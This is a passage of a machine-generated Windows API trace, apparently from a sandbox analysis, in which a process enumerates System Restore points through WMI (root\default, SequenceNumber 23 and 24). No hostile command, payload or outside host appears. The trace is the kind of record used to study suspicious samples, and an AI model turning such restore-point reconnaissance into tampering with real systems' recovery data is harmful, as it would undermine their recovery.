pToken=0x6ee480) returned 0x0 [0122.867] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.867] IUnknown:QueryInterface (in: This=0x6028318, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6028318) returned 0x0 [0122.867] IUnknown:AddRef (This=0x6028318) returned 0x4 [0122.867] IUnknown:Release (This=0x6028318) returned 0x3 [0122.867] IUnknown:Release (This=0x6028318) returned 0x2 [0122.867] CoTaskMemFree (pv=0xbe2280) [0122.867] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.867] IUnknown:AddRef (This=0x6028318) returned 0x3 [0122.867] IWbemClassObject:Get (in: This=0x6028318, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.867] IWbemClassObject:Get (in: This=0x6028318, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=23", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.867] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=23") returned 0x70 [0122.867] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=23") returned 0x70 [0122.867] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.867] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.867] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.867] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.868] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6024950) returned 0x0 [0122.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024950, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.868] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024950, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x60258b0) returned 0x0 [0122.868] WbemDefPath:IUnknown:Release (This=0x6024950) returned 0x0 [0122.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x60258b0) returned 0x0 [0122.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.868] WbemDefPath:IUnknown:AddRef (This=0x60258b0) returned 0x3 [0122.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe2280) returned 0x0 [0122.868] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2280, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.868] WbemDefPath:IUnknown:Release (This=0xbe2280) returned 0x3 [0122.869] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.869] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.869] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.869] WbemDefPath:IUnknown:Release (This=0x60258b0) returned 0x2 [0122.869] WbemDefPath:IUnknown:Release (This=0x60258b0) returned 0x1 [0122.869] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.869] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.869] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x60258b0) returned 0x0 [0122.869] WbemDefPath:IUnknown:AddRef (This=0x60258b0) returned 0x3 [0122.869] WbemDefPath:IUnknown:Release (This=0x60258b0) returned 0x2 [0122.869] WbemDefPath:IWbemPath:SetText (This=0x60258b0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=23") returned 0x0 [0122.869] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.869] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.869] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.869] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.869] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.869] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.869] IWbemClassObject:Get (in: This=0x6028318, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a6e48*=0, plFlavor=0x38a6e4c*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17, varVal2=0x0), pType=0x38a6e48*=19, plFlavor=0x38a6e4c*=0) returned 0x0 [0122.869] IWbemClassObject:Get (in: This=0x6028318, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a6e48*=19, plFlavor=0x38a6e4c*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17, varVal2=0x0), pType=0x38a6e48*=19, plFlavor=0x38a6e4c*=0) returned 0x0 [0122.869] CoTaskMemAlloc (cb=0x4) returned 0xbe22c0 [0122.869] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe22c0, puReturned=0x389bfe4 | out: apObjects=0xbe22c0*=0x60284b0, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.870] IUnknown:QueryInterface (in: This=0x60284b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x60284b0) returned 0x0 [0122.870] IUnknown:QueryInterface (in: This=0x60284b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.870] IUnknown:QueryInterface (in: This=0x60284b0, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.870] IUnknown:AddRef (This=0x60284b0) returned 0x3 [0122.870] IUnknown:QueryInterface (in: This=0x60284b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.870] IUnknown:QueryInterface (in: This=0x60284b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.870] IUnknown:QueryInterface (in: This=0x60284b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x60284b4) returned 0x0 [0122.871] IMarshal:GetUnmarshalClass (in: This=0x60284b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.871] IUnknown:Release (This=0x60284b4) returned 0x3 [0122.871] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.871] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.871] IUnknown:QueryInterface (in: This=0x60284b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.871] IUnknown:Release (This=0x60284b0) returned 0x2 [0122.871] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.871] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.871] IUnknown:QueryInterface (in: This=0x60284b0, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x60284b0) returned 0x0 [0122.871] IUnknown:AddRef (This=0x60284b0) returned 0x4 [0122.871] IUnknown:Release (This=0x60284b0) returned 0x3 [0122.871] IUnknown:Release (This=0x60284b0) returned 0x2 [0122.871] CoTaskMemFree (pv=0xbe22c0) [0122.871] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.871] IUnknown:AddRef (This=0x60284b0) returned 0x3 [0122.871] IWbemClassObject:Get (in: This=0x60284b0, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.871] IWbemClassObject:Get (in: This=0x60284b0, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=24", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.871] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=24") returned 0x70 [0122.871] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=24") returned 0x70 [0122.871] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.871] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.871] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.871] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.872] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6024960) returned 0x0 [0122.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024960, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.872] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024960, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6025920) returned 0x0 [0122.872] WbemDefPath:IUnknown:Release (This=0x6024960) returned 0x0 [0122.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6025920) returned 0x0 [0122.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.872] WbemDefPath:IUnknown:AddRef (This=0x6025920) returned 0x3 [0122.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe22c0) returned 0x0 [0122.873] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe22c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.873] WbemDefPath:IUnknown:Release (This=0xbe22c0) returned 0x3 [0122.873] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.873] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.873] WbemDefPath:IUnknown:Release (This=0x6025920) returned 0x2 [0122.873] WbemDefPath:IUnknown:Release (This=0x6025920) returned 0x1 [0122.873] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.873] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6025920) returned 0x0 [0122.873] WbemDefPath:IUnknown:AddRef (This=0x6025920) returned 0x3 [0122.873] WbemDefPath:IUnknown:Release (This=0x6025920) returned 0x2 [0122.873] WbemDefPath:IWbemPath:SetText (This=0x6025920, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=24") returned 0x0 [0122.873] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.873] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.873] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.874] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.874] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.874] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.874] IWbemClassObject:Get (in: This=0x60284b0, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a7698*=0, plFlavor=0x38a769c*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x18, varVal2=0x0), pType=0x38a7698*=19, plFlavor=0x38a769c*=0) returned 0x0 [0122.874] IWbemClassObject:Get (in: This=0x60284b0, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a7698*=19, plFlavor=0x38a769c*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x18, varVal2=0x0), pType=0x38a7698*=19, plFlavor=0x38a769c*=0) returned 0x0 [0122.874] CoTaskMemAlloc (cb=0x4) returned 0xbe2300 [0122.874] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe2300, puReturned=0x389bfe4 | out: apObjects=0xbe2300*=0x6028648, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.875] IUnknown:QueryInterface (in: This=0x6028648, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6028648) returned 0x0 [0122.875] IUnknown:QueryInterface (in: This=0x6028648, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.875] IUnknown:QueryInterface (in: This=0x6028648, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.875] IUnknown:AddRef (This=0x6028648) returned 0x3 [0122.875] IUnknown:QueryInterface (in: This=0x6028648, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.875] IUnknown:QueryInterface (in: This=0x6028648, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.875] IUnknown:QueryInterface (in: This=0x6028648, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x602864c) returned 0x0 [0122.875] IMarshal:GetUnmarshalClass (in: This=0x602864c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, 